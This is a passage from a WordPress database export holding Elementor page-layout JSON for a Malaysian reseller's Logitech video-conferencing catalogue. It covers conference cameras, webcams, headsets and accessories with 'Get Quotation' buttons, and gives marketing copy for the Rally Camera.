Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":20,\"padding\":{\"unit\":\"px\",\"top\":\"45\",\"right\":\"45\",\"bottom\":\"45\",\"left\":\"45\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5779,2984,'_elementor_version','0.4'),(5783,2985,'_elementor_template_type','post'),(5784,2985,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b84fa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5460384\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"975ce9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PRIVACY ASSURANCE<\\/h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to \\u201csee\\u201d anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c7d6951\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2ab0660\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera-1.jpg\",\"id\":2894}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"450ebf7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a7d076b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f621f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5785,2985,'_elementor_version','0.4'),(6084,3042,'_wp_page_template','template-fullwidth.php'),(6085,3042,'_elementor_edit_mode','builder'),(5788,2986,'_wp_page_template','template-fullwidth.php'),(5789,2986,'_elementor_edit_mode','builder'),(5790,2986,'_elementor_template_type','post'),(5791,2986,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera 